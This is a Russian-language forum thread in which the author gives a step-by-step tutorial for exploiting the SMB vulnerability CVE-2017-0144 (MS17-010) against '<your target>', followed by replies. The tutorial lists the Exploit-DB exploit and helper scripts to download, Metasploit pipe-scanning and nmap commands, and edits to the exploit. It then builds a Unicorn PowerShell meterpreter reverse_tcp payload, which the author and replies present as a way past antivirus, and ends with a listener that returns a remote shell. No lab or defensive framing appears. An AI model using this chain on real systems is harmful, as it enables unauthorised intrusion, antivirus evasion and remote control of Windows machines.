Статья CVE-2017-0144 |MS17-010

Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.
Качаем это:

https://www.exploit-db.com/exploits/42315/

и это :

https://github.com/worawit/MS17-010/blob/master/mysmb.py

и вот это:

https://github.com/trustedsec/unicorn

Кидаем все в одну папку и создаем файл:

touch _init_.py

Следующим шагом заходим в metasploit.
Пишем :

use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run

Должно появиться это:

IMG

Теперь пишем:

nmap -A -p 445 <ваша цель>

Нас интересует это:

IMG

Далее пишем:

gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>

Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода:

IMG

Убираем комментарий с этой строчки:

IMG

Приводим строчку в такой вид:

IMG

Теперь создадим нагрузку:

python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>

Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:

IMG

Удалим кавычку в конце:

IMG

Сохраняем файл.
Выставляем прослушку в metasploit :

use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload  windows/meterpreter/reverse_tcp
exploit

Эксплуатируем:

python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)

Выполняем команду до тех пор пока не появиться это:

IMG

Нам прилетает сессия)

IMG

Протестировано на:

- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86

 

[CHEATER]

Или просто:
use exploit/windows/smb/ms17_010_psexec

 

[Tayrus]

Или просто:
use exploit/windows/smb/ms17_010_psexec

У меня другая методика, я использую unicorn для обхода AV + показал как найти pipe + как достать креды smb

 

[CHEATER]

У меня другая методика, я использую unicorn для обхода AV + показал как найти pipe

AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.

 

[Tayrus]

AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.

Как говорил @SooLFaa

Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .

 

[MLNK]

Хорошая статья. Спасибо.

 

[CHEATER]

Как говорил @SooLFaa Посмотреть вложение 19038
Посмотреть вложение 19039
Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .

Позвольте уточнить один момент: какое отношение к powershell имеет вот это?

Спойлер

 

[Tayrus]

Позвольте уточнить один момент: какое отношение к powershell имеет вот это?

Спойлер

Ты действовал по моему методу?

 

[CHEATER]

Ты действовал по моему методу?

Нет, это просто изображение для наглядности.
Насколько я помню (возможно информация не верна, так-как все могло измениться) psexec avast не видит. Так что, оба метода должны закончится успешно.
P.S Вы можете взять классический eternalblue, написать: set payload windows/exec; set CMD calc.exe и посмотреть на результат.

 

[Vertigo]

Шикарная тема.Отлично раскрыты метод атаки и работа эксплойта.
Такие темы идут в золотой фонд форума.
Спасибо,с удовольствием читается.

 

[Elektrolife]

разве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..

Статья понравилась )

 

[Tayrus]

разве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..

Статья понравилась )

Еще как умеет)) Предположительно, чтобы были пайпы на машине, должно быть включено сетевое обнаружение с гостевой учеткой

 

[wooolff]

а на 10 пойдет?

 

[Air7771]

а на 10 пойдет? написано протестировано ... - Windows 10 Pro Build 10240 x64

 

[skill]

Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое

И этот эксп уже бесполезен

и кавычку можно и не удалять что на скрине и разобрав его до конца пишите типа копипаст

 

[Tayrus]

Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое

Это связка эксплойтов.

И этот эксп уже бесполезен

Не соглашусь)

 

[skill]

Где связка ? Пример

 

[Tayrus]

Где связка ? Пример

+eternalblue пробивает только windows7 и ниже, а тут как видишь:

 

[skill]

Что и требовалось понять что мамкин хекер до конца не поняв что это пытается думать мега хакер

 

[Tayrus]

Что и требовалось понять что мамкин хекер до конца не поняв что это пытается думать мега хакер

Тебе лучше знать, куда уж мне)